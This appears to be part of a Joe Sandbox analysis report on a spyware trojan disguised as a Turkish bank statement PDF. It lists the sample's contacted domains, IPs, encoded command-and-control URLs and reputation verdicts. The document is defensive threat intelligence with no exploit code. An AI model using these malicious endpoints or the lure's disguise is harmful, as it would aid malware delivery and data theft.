          http://www.nortonseecurity.com0%Avira URL Cloudsafe
          http://www.hubyazilim.com0%Avira URL Cloudsafe
          http://www.yeah-go.com0%Avira URL Cloudsafe
          http://www.energybig.xyz/ghii/?IlOzNN=EyIBgfI12Z&uyr=Hsu0eFbPaPXvQj1driY9Qb+UxIEGydZDMi24Zx/KBNJzrILAD6eOCtsvvO79CgG5LYmF38wKy0LUujLv+r7gh4V4lR0M0OxnEw==100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.genuineinsights.cloud
          		66.96.162.149
          		truetrue
            		unknown
            ladybillplanet.com
            		66.235.200.146
            		truetrueunknown
            cutgang.net
            		194.102.227.30
            		truetrue
              		unknown
              www.energybig.xyz
              		184.94.215.91
              		truetrue
                		unknown
                www.wenzid4.top
                		107.148.8.96
                		truetrue
                  		unknown
                  octohoki.net
                  		66.160.197.76
                  		truetrue
                    		unknown
                    www.octohoki.net
                    		unknown
                    		unknowntrue
                      		unknown
                      www.cutgang.net
                      		unknown
                      		unknowntrue
                        		unknown
                        www.ladybillplanet.com
                        		unknown
                        		unknowntrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://www.ladybillplanet.com/ghii/?uyr=nNwsU5RDSztrDyxRHILLs79A8ojzBVjbvYOj2DqB/Q3esj8ZmeFlGSz1p8lC+bcuH8jypYjqHnnMah8No3XkProQXaSL0hAuoA==&IlOzNN=EyIBgfI12Ztrue
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.octohoki.net/ghii/true
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.energybig.xyz/ghii/true
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.octohoki.net/ghii/?IlOzNN=EyIBgfI12Z&uyr=mbPzPtZ0Er8L5pad82wwGh9ocqcT3a4VC5lEcjpUbblZCC9rEfNiJ4Zzn4lMJLJJ2TaA1od8FsE8LCEUSFIoVIj1yavarUZuxw==true
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.ladybillplanet.com/ghii/true
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.genuineinsights.cloud/ghii/true
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.wenzid4.top/ghii/?IlOzNN=EyIBgfI12Z&uyr=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF3LCH1xNv1NtM5EA==true
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.genuineinsights.cloud/ghii/?uyr=b9pmEiWE3A9hICRLJ48/0GIWTdcguNEQkRUuEoMGZR2jfpcIS7+82C+h9uoa2hbDMoucG0FStkg6AqIGzw0gyz2/IGepHjywiw==&IlOzNN=EyIBgfI12Ztrue
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.energybig.xyz/ghii/?IlOzNN=EyIBgfI12Z&uyr=Hsu0eFbPaPXvQj1driY9Qb+UxIEGydZDMi24Zx/KBNJzrILAD6eOCtsvvO79CgG5LYmF38wKy0LUujLv+r7gh4V4lR0M0OxnEw==true
                          • Avira URL Cloud: malware
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://www.fluxgreenn.spaceexplorer.exe, 00000003.00000003.533260759.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.543156085.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.542800350.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536379987.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://duckduckgo.com/chrome_newtabcmmon32.exe, 00000004.00000003.371886260.0000000000A38000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.4.drfalse
                            		high
                            http://www.cutgang.net/ghii/explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://duckduckgo.com/ac/?q=-912K03JO.4.drfalse
                              		high
                              http://www.hubyazilim.com/ghii/explorer.exe, 00000003.00000003.533260759.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.543156085.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.542800350.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536379987.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              		unknown
                              http://www.sem-jobs.com/ghii/explorer.exe, 00000003.00000003.533260759.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.543156085.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.542800350.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536379987.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://search.yahoo.com?fr=crmas_sfpfcmmon32.exe, 00000004.00000003.371886260.0000000000A38000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.4.drfalse
                                		high
                                http://www.ixirwholesale.xyz/ghii/explorer.exe, 00000003.00000003.533260759.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.543156085.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.542800350.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536379987.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.cutgang.netexplorer.exe, 00000003.00000003.533260759.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.543156085.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.542800350.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536379987.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.de-nagel.com/ghii/explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.nortonseecurity.com/ghii/explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.octohoki.netexplorer.exe, 00000003.00000003.533260759.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.543156085.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.542800350.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536379987.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.assilajamiart.com/ghii/explorer.exe, 00000003.00000003.533260759.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.543156085.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.542800350.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536379987.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.wenzid4.topexplorer.exe, 00000003.00000003.533260759.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.543156085.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.542800350.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536379987.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.7dkjhk.comexplorer.exe, 00000003.00000003.533260759.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.543156085.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.542800350.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536379987.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.octohoki.netP7explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.de-nagel.comexplorer.exe, 00000003.00000003.533260759.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.543156085.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.542800350.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536379987.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.ladybillplanet.comexplorer.exe, 00000003.00000003.533260759.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.543156085.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.542800350.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536379987.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.563778060.00000000079B1000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.assilajamiart.comexplorer.exe, 00000003.00000003.533260759.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.543156085.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.542800350.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536379987.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.searchvity.com/?dn=explorer.exe, 00000003.00000002.570167249.0000000015A5C000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000004.00000002.558739823.00000000056BC000.00000004.10000000.00040000.00000000.sdmptrue
                                • URL Reputation: malware
                                		unknown
                                http://www.de-nagel.comevexplorer.exe, 00000003.00000003.533260759.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.543156085.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.542800350.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536379987.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.bemmulher.online/ghii/explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000003.00000000.306023557.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.557001836.0000000000921000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.bemmulher.onlineexplorer.exe, 00000003.00000003.533260759.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.543156085.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.542800350.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536379987.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icocmmon32.exe, 00000004.00000003.371886260.0000000000A38000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.4.drfalse
                                    		high
                                    http://www.7dkjhk.com/ghii/explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.sem-jobs.comexplorer.exe, 00000003.00000003.533260759.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.543156085.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.542800350.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536379987.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.yeah-go.com/ghii/explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.energybig.xyzexplorer.exe, 00000003.00000003.533260759.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.543156085.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.542800350.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536379987.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=-912K03JO.4.drfalse
                                      		high
                                      https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchcmmon32.exe, 00000004.00000003.371886260.0000000000A38000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.4.drfalse
                                        		high
                                        http://nsis.sf.net/NSIS_ErrorErrorT.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exefalse
                                          		high
                                          http://www.cutgang.net/ghii/?uyr=ZjEpLe7oxQ70uLnf6hiyuc6pu0EMckSA0PTIEH8mULBl4PD4NIfksCJCZa9jgfqw8hcmmon32.exe, 00000004.00000002.557026801.0000000000993000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000002.557026801.0000000000A3B000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=cmmon32.exe, 00000004.00000003.371886260.0000000000A38000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.4.drfalse
                                            		high
                                            https://ac.ecosia.org/autocomplete?q=-912K03JO.4.drfalse
                                              		high
                                              https://search.yahoo.com?fr=crmas_sfpcmmon32.exe, 00000004.00000003.371886260.0000000000A38000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.4.drfalse
                                                		high
                                                http://www.genuineinsights.cloudexplorer.exe, 00000003.00000003.533260759.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.543156085.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.542800350.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536379987.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: phishing
                                                		unknown
                                                http://www.wenzid4.top4explorer.exe, 00000003.00000003.533260759.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.543156085.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.542800350.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536379987.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.wenzid4.top/ghii/explorer.exe, 00000003.00000003.533260759.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.543156085.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.542800350.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536379987.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://www.searchvity.com/explorer.exe, 00000003.00000002.570167249.0000000015A5C000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000004.00000002.558739823.00000000056BC000.00000004.10000000.00040000.00000000.sdmptrue
                                                • URL Reputation: malware
                                                		unknown
                                                http://ladybillplanet.com/ghii/?uyr=nNwsU5RDSztrDyxRHILLs79A8ojzBVjbvYOj2DqB/Q3esj8ZmeFlGSz1p8lCexplorer.exe, 00000003.00000002.570167249.0000000015D80000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000004.00000002.558739823.00000000059E0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://www.fluxgreenn.space/ghii/explorer.exe, 00000003.00000003.533260759.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.543156085.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.542800350.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536379987.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.ixirwholesale.xyzexplorer.exe, 00000003.00000003.533260759.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.543156085.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.542800350.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536379987.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.yeah-go.comexplorer.exe, 00000003.00000003.533260759.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.543156085.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.542800350.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536379987.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=-912K03JO.4.drfalse
                                                  		high
                                                  http://www.hubyazilim.comexplorer.exe, 00000003.00000003.533260759.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.543156085.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.542800350.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536379987.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.nortonseecurity.comexplorer.exe, 00000003.00000003.533260759.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.543156085.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.542800350.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.568191855.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536379987.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535981634.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown

                                                  World Map of Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public IPs

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  66.235.200.146
                                                  		ladybillplanet.comUnited States
                                                  		13335CLOUDFLARENETUStrue
                                                  66.96.162.149
                                                  		www.genuineinsights.cloudUnited States
                                                  		29873BIZLAND-SDUStrue
                                                  107.148.8.96
                                                  		www.wenzid4.topUnited States
                                                  		54600PEGTECHINCUStrue
                                                  194.102.227.30
                                                  		cutgang.netRomania
                                                  		12302VODAFONE_ROCharlesdeGaullenr15ROtrue
                                                  66.160.197.76
                                                  		octohoki.netUnited States
                                                  		6939HURRICANEUStrue
                                                  184.94.215.91
                                                  		www.energybig.xyzUnited States
                                                  		394896VXCHNGE-NC01UStrue

                                                  General Information

                                                  Joe Sandbox Version:36.0.0 Rainbow Opal
                                                  Analysis ID:806923
                                                  Start date and time:2023-02-14 08:21:08 +01:00
                                                  Joe Sandbox Product:CloudBasic
                                                  Overall analysis duration:0h 10m 52s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                  Number of analysed new started processes analysed:7
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:1
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • HDC enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample file name:T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe
                                                  Detection:MAL
                                                  Classification:mal100.troj.spyw.evad.winEXE@9/5@8/6
                                                  EGA Information:
                                                  • Successful, ratio: 100%
                                                  HDC Information:
                                                  • Successful, ratio: 77.4% (good quality ratio 70.8%)
                                                  • Quality average: 72.8%
                                                  • Quality standard deviation: 31.9%
                                                  HCA Information:
                                                  • Successful, ratio: 100%
                                                  • Number of executed functions: 75
                                                  • Number of non-executed functions: 193
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe

                                                  Warnings

                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
                                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ctldl.windowsupdate.com
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  08:23:00API Interceptor496x Sleep call for process: explorer.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  66.235.200.146captain.exeGet hashmaliciousBrowse
                                                  • www.ladybillplanet.com/ghii/?5B=nNwsU5RDSztrDyxRHILLs79A8ojzBVjbvYOj2DqB/Q3esj8ZmeFlGSz1p8lC+bcuH8jypYjqHnnMah8No3XpEKoXZLS1zEAfoQ==&Z-y-ON=FXxQJAlmPf
                                                  http___185.246.221.143_pl2.exeGet hashmaliciousBrowse
                                                  • www.yaman-style.com/d06c/?mHC=gEJ54mFIwRh66Ae6L7uGyLYGbeEQfdX/4cHILN4O14RF/7dAwvjZyXpBwE928WLZwse/&7n=7nWd7RmXyP1LGne
                                                  nXfhmoy82p.exeGet hashmaliciousBrowse
                                                  • www.adattatoreit.com/m8on/?JBZ8=tALdn/sPTp4U4YS3OCFDtGFGnrRVrAVtTe8mQyWGdpVxOyMH4EszkIkYcOXeyZElzKa8XQc1mLvwfdFuiif4BOKPTFRhIgwAZXK5koi8yaz7&j6A=T45T1VQPUrjXf2Op
                                                  H4oimu4PlB.exeGet hashmaliciousBrowse
                                                  • www.flachick.com/aoj8/?y8Q=Wr9Dm/5SzM41BnlvUv1k3Y7jKSw9TQocHWKX+hoCdrCgVTGjQgdGKKK3lW4KeS50fuEi1WQ8xU7Scka8099Dik7n7alAjpMOOutQUsEftEWN&i2=Phup26RPJ8Nd8Zg
                                                  FEI9BuaEmY.exeGet hashmaliciousBrowse
                                                  • www.yourcustommattress.co.uk/8awd/
                                                  Forwarded.exeGet hashmaliciousBrowse
                                                  • www.iceboring.com/hy3h/?s6-=08HH0NEmiNcN62W2MNEFKyqBvrt6Dxuxurp87k8T2npS1Cca/SILOQgoLROT1jik7ir4qizsjIR0SPe+HTHY2MS2FT7bqA8m9g==&Kxl0i=6lGLHtnpT
                                                  qEHhJqcore.exeGet hashmaliciousBrowse
                                                  • www.iceboring.com/fuyb/?S4=u2JHH4d8zh-de&hZRh9l-=wqXCX8OhtvSlHAZwOfBWnOfZ/R2p/G6DdWl1tzf/7jxUDzpEBU+k0liEEKvagZgTd6jKHbMDh7HhDdjpxPwHtUvgTfkP1qfC5w==
                                                  go8foToOYf.exeGet hashmaliciousBrowse
